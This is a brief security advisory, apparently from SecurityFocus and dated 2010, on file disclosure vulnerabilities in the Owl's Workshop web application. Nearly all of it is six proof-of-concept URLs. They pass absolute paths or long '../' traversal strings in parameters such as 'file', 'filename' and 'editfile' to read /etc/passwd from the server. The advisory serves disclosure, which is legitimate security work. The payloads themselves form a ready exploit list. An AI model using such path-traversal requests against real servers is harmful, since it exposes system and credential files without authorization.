Owl's Workshop Multiple Remote File Disclosure Vulnerabilities

The following proofs of concept have been provided:

http://www.example.org/owls/glossaries/index.php?file=/etc/passwd
http://www.example.org/owls/multiplechoice/index.php?file=../../../../../../../../../../../../../../../etc/passwd&view=print
http://www.example.org/owls/readings/index.php?filename=/etc/passwd
http://www.example.org/owls/multiplechoice/resultsignore.php?filename=/etc/passwd
http://www.example.org/owls/workshop/glossary.php?editfile=../../../../../../../../../../../../../../../etc/passwd
http://www.example.org/owls/workshop/newmultiplechoice.php?edit=1&editfile=../../../../../../../../../../../../../../../etc/passwd


 

Privacy Statement
Copyright 2010, SecurityFocus